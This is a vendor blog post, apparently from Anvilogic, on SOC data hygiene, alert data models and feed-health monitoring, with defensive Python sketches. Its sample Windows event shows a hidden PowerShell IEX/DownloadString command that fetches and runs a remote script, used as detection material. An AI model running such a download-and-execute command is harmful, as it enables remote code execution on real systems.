Becoming a Mature SOC: Part 2 — Data Hygiene


The first post in this series discussed how the relationship (the curve) between enterprise security spend and enterprise breaches has not flattened. Given record spending on security technology, we would expect a drop in security breaches or an improvement in the dwell time to respond. The opposite is happening: spending is at record highs, and at the same time the number of confirmed breaches is also hitting record highs. Dwell time (the number of days a breach goes undetected or unremediated) has also increased significantly over the last 10 years.

There are four primary areas we will cover in this series on the journey to becoming a mature SOC: (1) prioritizing and understanding threats, (2) data quality/hygiene, (3) detection content, and (4) productivity and response. This post addresses the elephant in the room: data quality and hygiene.

Data: it often feels like you can't live with it, yet you obviously can't live without it. As the amount of technology generating machine data grows, the distributed data sets a SOC must maintain, and may depend on for incident response, become increasingly complex. After almost a decade of experience in a Fortune 50 SOC, I saw numerous challenges in detecting, analyzing, and mitigating cybersecurity threats. Whenever management asked, "What can we do to help?" the response was always, always, to help improve the data quality issues we were experiencing.

Fixing data is not sexy, it's not fun, and it's not "innovative," but the downstream impact of not having parsed, normalized, and enriched data sets in a SOC is significant. Here are some of the common problems SOCs experience when their data is a mess:

  • You likely can't use many of your detection tools (ex. SIEMs) or advanced detection capabilities (ex. AI or machine learning) effectively, or "as advertised," with bad data. Because the code can't work as expected, the volume of signals and alerts these technologies produce is significantly higher than originally expected.
  • You can't correlate activity across multiple data domains, and when you can, it is because you are writing complex parsing/normalization code at search time to connect the dots, code that is rarely reusable and hard to maintain over time.
  • Triage and investigations become extremely complicated, making it difficult for analysts to understand what happened, and the complexity of the data sets makes it challenging to connect the dots. Breaches likely go undetected for two reasons: (1) maybe you never got an alert at all, but (2) even if you did, your analyst probably wasn't able to easily understand what happened.
  • The SOC becomes a bottleneck for new business expansion. The new data feeds you onboard to protect new business units must be parsed, normalized, and aligned with existing data models to ensure consistency. That data cleansing process takes time, especially if the new feeds are complex or unfamiliar to the people doing the onboarding. Because of this, the data is often onboarded with a plan to fix it later, which hurts alerting, triage, and response times. Instead of reusing similar, already configured alerting packs for the new business units, you end up writing custom alerting for the new, specific data feeds to fulfill monitoring requirements before the new business goes live. This continuously adds to your SOC's technical debt and makes it harder and more time-consuming to fix over time.
  • Your long-term strategy is impacted. Your dreams of an autonomous SOC, of machine-learning-driven triage and response, and of becoming more proactive through hunting and AI-recommended suspicious activity are not achievable, no matter how much money or resources you throw at them, if you don't solve the upstream data problems.

Data issues go further than parsing, normalization, and enrichment. SIEMs and runtime engines normally gather hundreds of data sources, from different environments, at massive scale. The structure of the data is a problem, but so are its health and integrity.

  • Data arriving in the SIEM is often delayed, unpredictably, which causes inconsistencies in detection and response.
  • Timestamps! Yes, believe it or not, time zones can be inconsistent across events, which makes it very difficult to build realistic timelines and decide what happened during an incident.
  • Logging patterns change, especially during transport, and that can break parsing. Is there any monitoring in place to notify you when this happens? How many of your alerts break when it does? Half?
  • How often do you deal with feeds dropping? Does your SOC even know when a critical feed goes down, or when a subset of machines or appliances stops reporting data? This undermines the accuracy of your exposure checks when you tell your boss, "Nope, we didn't see any activity of x.exe on our endpoints, we are good." A minimal sketch of such a feed-health check follows this list.
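As a starting point for that last item, a check like the following can catch silent feeds. This is a minimal sketch in Python, assuming you can track the most recent event time per feed (in practice via a SIEM query such as "latest event time per sourcetype"); every feed name and threshold here is an illustrative assumption:

```python
from datetime import datetime, timedelta, timezone

# Maximum tolerated silence per feed (illustrative names and thresholds).
FEED_SLA = {
    "edr_endpoint": timedelta(minutes=15),
    "firewall": timedelta(minutes=5),
    "windows_security": timedelta(minutes=10),
}

# In practice this state comes from the SIEM; a plain dict keeps the sketch
# self-contained.
LAST_SEEN: dict[str, datetime] = {}

def record_event(feed: str, ts: datetime) -> None:
    """Called by the ingestion pipeline whenever an event arrives for a feed."""
    if feed not in LAST_SEEN or ts > LAST_SEEN[feed]:
        LAST_SEEN[feed] = ts

def stale_feeds(now: datetime | None = None) -> list[str]:
    """Return every feed that has been silent longer than its SLA allows."""
    now = now or datetime.now(timezone.utc)
    never = datetime.min.replace(tzinfo=timezone.utc)  # treat unseen feeds as stale
    return [feed for feed, sla in FEED_SLA.items()
            if now - LAST_SEEN.get(feed, never) > sla]
```

Each entry returned by stale_feeds is a candidate for a page to production support, which also keeps your exposure checks honest.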

All of these issues significantly impair your ability to detect and respond to cyber attacks. If you haven't invested time and energy into making your data usable, then you are likely wasting money on buzzword software that does AI, ML, and automation: you may have treated some symptoms, but you are nowhere close to curing the disease.

Ok, let's agree that these problems exist, and that for a company analyzing 50–100TB or even petabytes of data a day, they are obviously very difficult to solve. So let's take a step back and focus on some ways to start addressing them. A good approach is to start with your alerts: yes, the notifications that are supposed to tell you potentially malicious activity is occurring. You may generate hundreds of thousands of these events per day across all of your technologies and alerting engines (ex. custom detection content, EDR, AV, IDS, WAF, network/NetFlow, CASB, etc.). Ensuring these events are correctly parsed, normalized, and enriched is a good place to start.

This improves your ability to correlate alert activity across complicated, distributed data sets and gives you a better return on investment from your existing detection tools: you may actually start using those scattered alerts within detection scenarios once you can correlate them over a period of time. It is highly unlikely that a 250-day breach did not trigger at least one suspicious event across these alerting engines; the issue is that you didn't know, because you couldn't see through the noise or couldn't use the event in conjunction with other activity in a way that triggered an effective response. Fancy ML engines won't be able to connect the dots either without some sort of structured data set!

So, what’s the solution? Here are some things to think about when trying to build a better alerting architecture that can handle some of the data quality problems SOCs have been facing.

  1. Create a data model for your alert output. Yes, just try that first. If you can easily correlate alert output, you can begin to connect the dots between distributed data sets, which leads to better detection opportunities. It also allows you to create attack scenarios (triggering alerts only if the same machines generate over X alerts in a specific period of time). A minimal sketch of such a model appears after this list.
  2. Enrich your alert output at search time or at index time (or even in-stream on the data pipeline, if you are so inclined) so that the enriched data is included in the alert itself. This structured data set is what gives the SOC as much context as possible when triaging and investigating an alert, allowing analysts to make better decisions and improving their time to respond to and mitigate a potential threat.
  3. Implement health monitoring on your alerting content to ensure it is operating as expected. Take samples of the suspicious activity your alerting is trying to detect and replay those malicious samples through your SIEM engine to verify the alerts fire. Once mature, you can even start building detection logic for when raw data feeds drop, or when event formats/patterns change on the stream and break parsing and normalization.
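To make step 1 concrete, here is a minimal sketch of what a normalized alert ("event of interest") record and a simple enrichment step might look like. The field names, lookup table, and function are illustrative assumptions, not a prescribed schema:

```python
from dataclasses import dataclass

# Hypothetical lookup mapping a detection's internal name to MITRE ATT&CK tags.
MITRE_LOOKUP = {
    "ps_invoke_expression": {"tactic": "Execution",
                             "technique": "T1059.001 PowerShell"},
}

@dataclass
class EventOfInterest:
    timestamp: str        # normalized to UTC, ISO 8601
    host: str
    user: str
    detection_name: str   # which rule or engine fired
    source: str           # EDR, AV, IDS, WAF, custom SIEM logic, ...
    data_domain: str      # endpoint, network, identity, ...
    raw_event: str        # original event kept for triage context
    mitre_tactic: str = ""
    mitre_technique: str = ""

def enrich(alert: EventOfInterest) -> EventOfInterest:
    """Tag the alert with MITRE ATT&CK context from the lookup table."""
    tags = MITRE_LOOKUP.get(alert.detection_name, {})
    alert.mitre_tactic = tags.get("tactic", "unknown")
    alert.mitre_technique = tags.get("technique", "unknown")
    return alert
```

Once every alerting engine's output is mapped into a shape like this, correlation no longer depends on per-source parsing logic at search time.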

What Does Structured Data Look Like?

Let me show you a simple example, using an alert from Windows event logs, of the difference between the raw event and the structured event. This alert is looking for a PowerShell Invoke-Expression.

Unstructured Windows Security Event Log
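(The original post shows a screenshot of the raw event here. Purely for illustration, an abbreviated, hypothetical Windows Security Event ID 4688 process-creation record behind this detection, assuming command-line auditing is enabled, might look roughly like this:)

```
EventID:              4688 (A new process has been created)
Computer:             WKSTN-042.corp.example.com
New Process Name:     C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Creator Process Name: C:\Windows\System32\cmd.exe
Process Command Line: powershell.exe -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('hxxp://[...]/stage1.ps1')"
```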

Now, look at the same output when using Anvilogic. This is an example of what our alerts look like inside our Events of Interest model. Not only do we keep the raw event context, but we also automatically parse and normalize the data to our alert data model, which includes additional tagging and enrichment to aid in advanced correlation.

Enriched Windows Security Event Log

As you can see, having your alert output indexed in a form that is already parsed, normalized, and enriched to a standardized data model lets you run more advanced analytics (correlation, ML, etc.) across the cleanly indexed data set. Not only are open-source frameworks used during enrichment (MITRE ATT&CK, Cyber Kill Chain, threat groups, etc.), but the output is also tagged with OS type and machine type and assigned a specific data domain, which ensures field-value pair standardization across the output. This type of organized data set lets you build correlations not only on the details of the malicious event (ex. process and command-line arguments) but also on the enriched values (ex. avl_mitre_technique="PowerShell"). A minimal correlation sketch over fields like these follows.
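For example, here is a minimal sketch of a correlation that becomes easy once alerts carry enriched fields: flag any host whose alerts span two or more distinct MITRE ATT&CK techniques within a one-hour window. It reuses the illustrative EventOfInterest record sketched earlier; the window and threshold are arbitrary assumptions:

```python
from collections import defaultdict
from datetime import datetime, timedelta

def hosts_spanning_techniques(alerts, window=timedelta(hours=1), min_techniques=2):
    """alerts: iterable of EventOfInterest (see earlier sketch), sorted by time."""
    recent = defaultdict(list)   # host -> [(event_time, technique), ...]
    flagged = set()
    for alert in alerts:
        now = datetime.fromisoformat(alert.timestamp)
        # Keep only this host's alerts that still fall inside the sliding window.
        recent[alert.host] = [(ts, tech) for ts, tech in recent[alert.host]
                              if now - ts <= window]
        recent[alert.host].append((now, alert.mitre_technique))
        if len({tech for _, tech in recent[alert.host]}) >= min_techniques:
            flagged.add(alert.host)
    return flagged
```

The same logic would be a brittle, source-specific query if each engine's alerts kept their native field names.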

How is Anvilogic Helping in Data Quality?

At Anvilogic, we are focused on actually cleaning up existing unstructured alerting data sets, not just providing you with more alerts that are harder to correlate (as shown in the alert sample above). We are using machine learning to better understand the best ways to parse, normalize, and enrich alert data sets coming from distributed systems. This means you should be able to use alerts from any technology, whether EDR, anti-virus, IDS, WAF, or custom SIEM logic produced by your threat detection teams, in conjunction with new content from the Anvilogic platform, to generate an events-of-interest data set that allows you to build more advanced, effective threat scenario correlation.

The enriched event shown above is an example of what our alert output looks like. All content from our platform is stored in this manner, and we can automatically align your existing alerting content to that structure, making your custom alerts more effective for you too.

Below is the next-generation alerting flow architecture that will likely exist in most large enterprises in the coming years. To handle alert output from each distributed system (which can be millions of events per day), Anvilogic is focused on helping you solve these strategic initiatives as well:

  1. Use ML models to better normalize, tag, and enrich alerting data sets on the data stream, allowing for better indexing across distributed SIEMs or appliances (ex. EDRs, cloud SIEM, on-premises SIEM, etc.). You should fix your data hygiene and enrichment issues as far upstream as possible, not in your SOAR platform.
  2. Align all detection output to standardized data models that store "events of interest" (i.e., alert results). You should be able to do this at either (1) search time or (2) index time, so that you can easily correlate, or use additional code to find, patterns of attack within your network.
  3. Remove the roadblocks that prevent your new business services from quickly expanding; the SOC should no longer be that bottleneck. You should be able to point alert data (regardless of the data domain it comes from) at your events of interest quickly, and leverage an enrichment and normalization engine on the stream processor to tag distributed alerting data sets automatically.
  4. Because the focus is on structured alerting data sets, you can now reuse detection content that correlates alert activity based on the enrichment values (ex. MITRE ATT&CK), which allows you to quickly deploy the same threat scenario correlation use cases across newly onboarded infrastructure.
  5. Apply health monitoring code at both the SIEM level (raw data ingestion) and the correlation level (events of interest) to notify production support teams when feeds or logging patterns change in ways that cause alerts to break or stop operating as expected. A minimal replay-test sketch follows this list.
  6. Leverage SOAR code for remediation, not enrichment. SOAR integrations with different security technology APIs allow for powerful ways to reduce mitigation dwell time, especially when you have higher-efficacy threat scenarios generating response plans. In the future, Anvilogic will also focus on providing common mitigation code that can be plugged into SOAR playbooks to help automate remediation efforts.
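To make the health monitoring in step 5 (and step 3 of the earlier list) concrete, here is a minimal sketch of a detection replay test: feed a synthetic known-bad sample through the detection logic and fail loudly if the expected alert does not fire. The sample event and the detection stand-in are illustrative assumptions; in practice the check would run a SIEM search against an injected event:

```python
# Synthetic known-bad sample (hypothetical host and command line).
SAMPLE_EVENT = {
    "host": "detection-canary-01",
    "command_line": 'powershell.exe -nop -c "IEX (New-Object Net.WebClient)..."',
}

def detects_ps_invoke_expression(event: dict) -> bool:
    """Stand-in for the real detection (in practice, a SIEM search or rule)."""
    cmd = event.get("command_line", "").lower()
    return "powershell" in cmd and "iex" in cmd

def run_detection_health_check() -> None:
    """Replay the known-bad sample and alert production support on failure."""
    if not detects_ps_invoke_expression(SAMPLE_EVENT):
        raise RuntimeError(
            "Known-bad sample did not trigger the detection; "
            "parsing or rule logic may be broken."
        )

if __name__ == "__main__":
    run_detection_health_check()
```

Scheduled regularly, a test like this catches silent breakage (a parser change, a renamed field) before a real incident does.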

The graphic below shows how you can begin to send alerts from your existing technology stacks (on-premises, cloud, and XDR tools) to an events-of-interest data model. Anvilogic can help you on this journey of standardizing your detection output so you can build a better detection and response program.

SOC Data Flow

In summary, Anvilogic is focused on solving the real problems that have plagued SOCs for decades by:

  1. Fixing data quality issues upstream, providing code and models to help parse, tag, and enrich the alerting data sets that come from your distributed systems.
  2. Filling your detection and health monitoring gaps at the SIEM layer, providing logic for multiple SIEM languages across the MITRE ATT&CK framework.
  3. Allowing you to create codeless, SIEM-agnostic content packs (ex. threat scenarios) and/or leverage our existing correlation use cases to identify patterns of attack that can be sent to a SOAR platform for mitigation.

Chat with our team to receive a free maturity assessment
